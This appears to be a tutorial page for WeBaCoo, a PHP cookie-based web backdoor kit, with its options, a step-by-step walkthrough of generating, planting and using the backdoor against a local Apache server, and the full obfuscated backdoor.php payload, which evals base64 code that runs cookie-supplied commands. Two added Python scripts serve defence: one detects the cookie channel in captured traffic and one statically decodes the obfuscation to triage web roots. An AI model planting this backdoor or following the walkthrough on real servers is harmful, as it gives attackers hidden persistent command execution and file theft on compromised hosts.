Webacoo

Description

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server…

Usage

Syntax

webacoo [options]

Options

  -g		Generate backdoor code (-o is required)

  -f FUNCTION	PHP System function to use
	FUNCTION
		1: system 	(default)
		2: shell_exec
		3: exec
		4: passthru
		5: popen

  -o OUTPUT	Generated backdoor output filename

  -r 		Return un-obfuscated backdoor code

  -t		Establish remote "terminal" connection (-u is required)

  -u URL	Backdoor URL

  -e CMD	Single command execution mode (-t and -u are required)

  -m METHOD	HTTP method to be used (default is "GET")

  -c C_NAME	Cookie name (default: "M-cookie")

  -d DELIM	Delimiter (default: New random for each request)

  -a AGENT	HTTP header user-agent (default exist)

  -p PROXY	Use proxy (tor, ip:port or user:pass:ip:port)

  -v LEVEL	Verbose level
	LEVEL
		0: no additional info (default)
		1: print HTTP headers
		2: print HTTP headers + data

  -l LOG	Log activity to file

  -h		Display help and exit

  update	Check for updates and apply if any
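The whole channel lives in the Cookie and Set-Cookie headers; the -c, -d and -a options above only change how it looks on the wire. That matters for defenders because an ordinary access log does not record cookies, so the headers have to be captured at a reverse proxy, WAF or packet capture. The following added example is written for this page and is not part of WeBaCoo. It inspects one captured request/response pair: a low-confidence check for any request cookie that is base64 of readable text, and a high-confidence check for the exact protocol of the backdoor printed by `cat backdoor.php` later on this page (cookie `cm` carries the base64 command, `cn` names the response cookie, `cp` is the delimiter wrapped around the base64 output in that cookie). The sample exchange, the delimiter value and the benign exchange are constructed, not captured from a real host.

```python
import base64
import binascii
from urllib.parse import quote, unquote

# --- Constructed sample exchange (not captured from a real host) ----------------
DELIM = "x9Zq"   # stand-in for the per-request random delimiter (-d)
COMMAND_OUTPUT = "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
SAMPLE_REQUEST = (
    "GET /backdoor.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cookie: cm=" + base64.b64encode(b"id").decode() + "; cn=M-cookie; cp=" + DELIM + "\r\n"
)
# PHP's setcookie() URL-encodes the value, so '=', '+' and '/' arrive percent-encoded.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: M-cookie="
    + quote(DELIM + base64.b64encode(COMMAND_OUTPUT.encode()).decode() + DELIM, safe="")
    + "\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
)
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nCookie: theme=dark; lang=en\r\n"
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nSet-Cookie: theme=dark; Path=/\r\n"


def parse_cookie_header(value):
    """Turn 'a=1; b=2; Path=/' into a dict; attribute-only parts are ignored."""
    cookies = {}
    for part in value.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name.strip()] = val.strip()
    return cookies


def decode_if_text(blob):
    """Return the decoded string when blob is valid base64 of printable text, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def header_values(raw_headers, name):
    """All values of one header (case-insensitive) from a raw header block."""
    prefix = name.lower() + ":"
    return [line.split(":", 1)[1].strip()
            for line in raw_headers.splitlines()
            if line.lower().startswith(prefix)]


def inspect_exchange(request_headers, response_headers):
    """Return (confidence, cookie_name, decoded_text) findings for one request/response pair."""
    request_cookies = {}
    for value in header_values(request_headers, "Cookie"):
        request_cookies.update(parse_cookie_header(value))
    findings = []

    # Low confidence: any request cookie whose value is base64 of readable text.
    for name, value in request_cookies.items():
        text = decode_if_text(value)
        if text:
            findings.append(("low", name, text))

    # High confidence: the protocol of the backdoor shown on this page.
    # cm = base64 command, cn = name of the response cookie, cp = delimiter
    # wrapped around the base64 command output inside that response cookie.
    if {"cm", "cn", "cp"} <= request_cookies.keys():
        cn, cp = request_cookies["cn"], request_cookies["cp"]
        for value in header_values(response_headers, "Set-Cookie"):
            set_cookies = parse_cookie_header(value)
            if cn not in set_cookies:
                continue
            body = unquote(set_cookies[cn])
            if len(body) > 2 * len(cp) and body.startswith(cp) and body.endswith(cp):
                output = decode_if_text(body[len(cp):-len(cp)])
                if output is not None:
                    findings.append(("high", cn, output))
    return findings


if __name__ == "__main__":
    for finding in inspect_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print(finding)
```

The low-confidence check will also fire on legitimate cookies that happen to be base64 text, so treat it as a hint to review; the high-confidence check needs the request and the matching response together, which is why the capture point has to see both directions.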

Example

cyborg@cyborg:~$ sudo webacoo -g -o backdoor.php

	WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
	Copyright (C) 2011-2012 Anestis Bechtsoudis
	{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Backdoor file "backdoor.php" created.

Now start the Apache server:

cyborg@cyborg:~$ sudo service apache2 start
[sudo] password for cyborg: 
 * Starting web server apache2                                                AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message

Check that the file is there:

cyborg@cyborg:~$ ls
backdoor.php  Documents  examples.desktop  Pictures  Videos
Desktop       Downloads  Music             Public

Copy the file to the target web server; in this case we use our own local Apache server (web root under /var/www):

cyborg@cyborg:~$ sudo cp backdoor.php /var/www/html

Now connect to the file hosted on the server, in this case our localhost:

cyborg@cyborg:~$ sudo webacoo -t -u http://127.0.0.1/backdoor.php

	WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
	Copyright (C) 2011-2012 Anestis Bechtsoudis
	{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.

webacoo$

List the remote directory with ls:

webacoo$ ls      
backdoor.php
img
index.html
rips

We can view the files:

webacoo$ cat index.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works</title>
</head>
  <body>
    <div class="main_page">
      <div class="page_header floating_element">
        <img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/>
        <span class="floating_element">
          Apache2 Ubuntu Default Page
        </span>
      </div>
 </body>
</html>

webacoo$ cat backdoor.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
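The file above is what an incident responder finds in a web root: the function name `base64_decode` is assembled with strrev() so that a plain grep for it misses, and the payload is base64 with a space between every character so that a base64 pattern misses too. The following added example, written for this page and not part of WeBaCoo, undoes both tricks statically (no PHP is executed) and reports which dangerous calls, input sources and output channels the decoded payload uses; `scan_webroot` applies the same triage to every `.php` file under a directory. The sample string is the backdoor exactly as printed by `cat backdoor.php` above; the regexes and indicator names are this example's own.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# Sample: the obfuscated backdoor exactly as printed by 'cat backdoor.php' on this page.
SAMPLE_BACKDOOR = r'''<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>'''

# Calls and inputs whose presence in a decoded payload matters for triage.
DANGEROUS_CALLS = ("system(", "shell_exec(", "exec(", "passthru(", "popen(", "eval(")
INPUT_SOURCES = ("$_COOKIE", "$_GET", "$_POST", "$_REQUEST")

# strrev("edoced_4"."6esab"): a function name built from reversed string pieces.
STRREV_CONCAT = re.compile(r'strrev\(\s*("[^"]*"(?:\s*\.\s*"[^"]*")*)\s*\)')
# str_replace(" ","","a W Y ..."): a base64 blob padded with spaces between characters.
SPACED_B64 = re.compile(r'str_replace\(\s*" "\s*,\s*""\s*,\s*"([^"]*)"\s*\)')


def resolve_strrev(src):
    """Return the names produced by strrev() over concatenated string literals."""
    names = []
    for m in STRREV_CONCAT.finditer(src):
        pieces = re.findall(r'"([^"]*)"', m.group(1))
        names.append("".join(pieces)[::-1])
    return names


def extract_spaced_payloads(src):
    """Decode every space-padded base64 literal fed through str_replace(" ","",...)."""
    payloads = []
    for m in SPACED_B64.finditer(src):
        blob = m.group(1).replace(" ", "")
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64; leave it for manual review
    return payloads


def triage(src):
    """Summarise what a suspicious PHP file does, without executing it."""
    names = resolve_strrev(src)
    payloads = extract_spaced_payloads(src)
    indicators = []
    if "eval(" in src:
        indicators.append("eval() in source")
    for name in names:
        indicators.append("function name built with strrev(): " + name)
    for payload in payloads:
        for call in DANGEROUS_CALLS:
            if call in payload:
                indicators.append("decoded payload calls " + call[:-1])
        for var in INPUT_SOURCES:
            if var in payload:
                indicators.append("decoded payload reads " + var)
        if "setcookie(" in payload or "header(" in payload:
            indicators.append("decoded payload writes response headers (possible covert output channel)")
    return {"hidden_names": names, "payloads": payloads, "indicators": indicators}


def scan_webroot(root):
    """Return {path: triage result} for every .php file under root that raises an indicator."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        try:
            result = triage(path.read_text(errors="replace"))
        except OSError:
            continue
        if result["indicators"]:
            hits[str(path)] = result
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, result in scan_webroot(sys.argv[1]).items():
            print(path)
            for line in result["indicators"]:
                print("   ", line)
    else:
        for line in triage(SAMPLE_BACKDOOR)["indicators"]:
            print(line)
```

Run it with a directory argument to sweep a web root, or with no argument to triage the sample above. The checks are deliberately narrow to this obfuscation style; a file that hides its payload differently will not be decoded, but the `eval() in source` indicator still flags it for a closer look.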

List the available extension modules with load:

webacoo$ load
Currently available extension modules:
o MySQL-CLI: MySQL Command Line Module
    mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

o PSQL-CLI: Postgres Command Line Module
    psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

o Upload: File Upload Module
    upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

o Download: File Download Module
    download <remote_file>                   (ex. 'download config.php')

o Stealth: Enhance Stealth Module
    stealth <webroot_dir>                 (ex. 'stealth /var/www/html')

[*] Type the module name with the correct args.

>

Download a file:

> download index.html 
[*] Checking for 'xxd' tool.
[*] Proceed to download using 'xxd' tool.

[*] Retrieving 0-1000 bytes of remote file.
[*] Retrieving 1000-2000 bytes of remote file.
[*] Retrieving 2000-3000 bytes of remote file.
[*] Retrieving 3000-4000 bytes of remote file.
[*] Retrieving 4000-5000 bytes of remote file.
[*] Retrieving 5000-6000 bytes of remote file.
[*] Retrieving 6000-7000 bytes of remote file.


[+] File successfully downloaded at current directory.
[*] Download module unloaded.

Load the modules again:

webacoo$ load
Currently available extension modules:
o MySQL-CLI: MySQL Command Line Module
    mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

o PSQL-CLI: Postgres Command Line Module
    psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

o Upload: File Upload Module
    upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

o Download: File Download Module
    download <remote_file>                   (ex. 'download config.php')

o Stealth: Enhance Stealth Module
    stealth <webroot_dir>                 (ex. 'stealth /var/www/html')

[*] Type the module name with the correct args.

> 

The MySQL-CLI module can also be used:

> mysql-cli http://127.0.0.1 admin password
[+] mysql-cli module successfully loaded.
[*] Type 'unload'  to unload the module and return to the original cmd.

mysql-cli>

 
